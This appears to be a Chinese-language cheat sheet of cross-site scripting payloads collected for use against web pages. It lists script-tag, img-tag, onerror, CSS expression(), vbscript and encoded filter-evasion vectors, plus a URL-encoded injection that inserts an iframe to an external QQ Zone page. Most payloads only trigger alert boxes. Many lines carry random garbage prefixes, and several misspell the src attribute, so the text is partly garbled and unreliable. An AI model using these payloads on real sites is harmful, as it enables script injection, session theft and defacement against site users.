跨站语句大全

admin

<script>alert("跨站")</script>    (最常用）
5 T1 z' x2 h$ |+ ^: d2 m( ]<img scr=javascript:alert("跨站")></img>
0 g9 P9 {0 |1 E* Z3 e0 U<img scr="javascrip&#116&#58 alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格）
3 y4 B% \$ Q) @' q* R<img scr="#" onerror=alert(/跨站/)></img>
% J2 U6 `0 b* ^& O2 ^- U<img scr="#" style="xss:expression(alert(/xss/));"></img>
' S$ o( w4 V0 n# Z4 C& D; Z<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释）
/ G6 O/ z- H* k0 A( k3 {. @<img src=vbscript:msgbox ("xss")></img>
7 `( A' I& J9 v<style> input {left:expression (alert('xss'))}</style>
! }$ d, s3 h; I8 y! b$ n1 I" a" Q<div style={left:expression (alert('xss'))}></div>
/ B3 E" F7 U. A% ^<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
html 实体 <div style={left:&#ｘ0065；xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">

+ `3 A" A% S) B) Z# N"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
7 w" A: k/ d2 |